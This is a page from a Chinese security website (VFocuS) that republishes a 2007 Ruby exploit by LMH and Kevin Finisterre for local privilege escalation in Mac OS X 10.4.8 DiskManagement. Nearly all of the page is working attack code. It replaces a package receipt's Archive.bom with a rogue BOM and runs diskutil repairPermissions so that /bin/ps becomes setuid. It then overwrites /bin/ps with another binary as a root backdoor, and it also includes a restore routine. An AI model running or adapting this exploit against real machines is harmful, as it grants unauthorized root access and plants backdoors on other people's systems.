首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Mac OS X 10.4.8 DiskManagement BOM Local Privilege Escalation Exploit
来源:lmh [at] info-pull.com 作者:LMH 发布时间:2007-01-08  

#!/usr/bin/ruby
# (c) 2006 LMH <lmh [at] info-pull.com>
# Kevin Finisterre <kf_lists [at] digitalmunition.com>
#
# Thanks to The French Connection for bringing this in-the-wild 0-day to
# our attention. If /tmp/ps2 exists on your system, you've been pwned already.
# Thanks to the original authors of the exploit ('meow'). You know who you are.
#
# "They did it for the lulz" - A Fakecure spokesperson on the 'Mother Of all Bombs'.
# "kcoc kcus I ro tcarter uoY" - The Original Drama P3dobear (Kumo' n').
#

require 'fileutils'

# Basic configuration
TARGET_BINARY = "/bin/ps" # Changing this requires you to create a new TEH_EVIL_BOM
TARGET_BACKUP_PATH = "/tmp/ps2" # see: "man lsbom" and "man mkbom"
TARGET_SHELL_PATH = "/usr/bin/id" # Ensure the binary doesn't drop privileges!
BOMARCHIVE_PATH = "/Library/Receipts/Essentials.pkg/Contents/Archive.bom"
DISKUTIL_PATH = "/usr/sbin/diskutil"
TEH_EVIL_BOM = File.read("Evil.bom")

#
# Repair a rogue installation using the back-up files. Useful for testing.
# Probably you don't want to repair on real pwnage... :-)
#
def do_repair()
puts "++ Repairing (moving back-ups to original path)"
puts "++ #{File.basename(BOMARCHIVE_PATH)}"
FileUtils.rm_f BOMARCHIVE_PATH
FileUtils.cp File.join("/tmp", File.basename(BOMARCHIVE_PATH)), BOMARCHIVE_PATH

puts "++ #{TARGET_BINARY}"
FileUtils.rm_f TARGET_BINARY
FileUtils.cp TARGET_BACKUP_PATH, TARGET_BINARY

puts "++ Removing back-ups..."
FileUtils.rm_f TARGET_BACKUP_PATH
FileUtils.rm_f File.join("/tmp", File.basename(BOMARCHIVE_PATH))

puts "++ Done. Repairing disk permissions..."
exec "#{DISKUTIL_PATH} repairPermissions /"
end

#
# Ovewrite TARGET_BINARY with TARGET_SHELL_PATH and set the rogue permissions unless
# they are already properly set.
#
def exploit_bomb()
puts "++ We get signal. Overwriting #{TARGET_BINARY} with #{TARGET_SHELL_PATH}."

# Overwriting with this method will always work well if binary at TARGET_SHELL_PATH
# is bigger than TARGET_BINARY (ex. /bin/sh is 1068844 bytes and /bin/ps is 68432).
# An alternative method is running diskutil again to set the rogue permissions.
over = File.new(TARGET_BINARY, "w")
over.write(File.read(TARGET_SHELL_PATH))
over.close

unless FileTest.setuid?(TARGET_BINARY)
fork do
FileUtils.rm_f TARGET_BINARY
FileUtils.cp TARGET_SHELL_PATH, TARGET_BINARY
exec "#{DISKUTIL_PATH} repairPermissions /"
end
Process.wait
end

puts "++ Done. Happy ruuting."
end

#
# Overwrite the BOM with the rogue version, set new permissions.
#
def set_up_the_bomb()
puts "++ Preparing to overwrite (#{BOMARCHIVE_PATH})"

# Back-up the original Archive.bom, set mode to 777
if FileTest.writable?(BOMARCHIVE_PATH)
backup_path = File.join("/tmp", File.basename(BOMARCHIVE_PATH))

unless FileTest.exists?(backup_path)
puts "++ Creating backup copy at #{backup_path}"
FileUtils.cp BOMARCHIVE_PATH, backup_path
end

puts "++ Removing original file."
FileUtils.rm_f BOMARCHIVE_PATH

puts "++ Writing backdoor BOM file."
target_bom = File.new(BOMARCHIVE_PATH, "w")
target_bom.write(TEH_EVIL_BOM)
target_bom.close
puts "++ Done."
else
puts "-- Can't write to '#{BOMARCHIVE_PATH}. No pwnage for you today."
exit
end

# Back-up the target backdoor path
unless FileTest.exists?(TARGET_BACKUP_PATH)
puts "++ Creating backup copy of #{TARGET_BINARY} at #{TARGET_BACKUP_PATH}"
FileUtils.cp TARGET_BINARY, TARGET_BACKUP_PATH
end

# Let diskutil do it's job (set permissions over target binary path, setuid)
puts "++ Running diskutil to set the new permissions for the backdoor..."
fork do
exec "#{DISKUTIL_PATH} repairPermissions /"
end
Process.wait

puts "++ Somebody set up us the bomb!"
exploit_bomb()
end

# Here be pwnies
if ARGV[0] == "repair"
do_repair()
else
set_up_the_bomb()
end




 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·CA BrightStor ARCserve (tapeen
·Mac OS X 10.4.8 DiskManagement
·iLife iPhoto Photocast (XML ti
·L2J Statistik Script <= 0.0
·Acunetix WVS <= 4.0 2006071
·NaviCOPA Web Server 2.01 (GET)
·Simple Web Content Management
·Wordpress 2.0.5 Trackback UTF-
·VerliAdmin <= 0.3 (language
·AllMyLinks <= 0.5.0 (index.
·Apple Quicktime (rtsp URL Hand
·OpenBSD 3.x - 4.0 vga_ioctl()
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved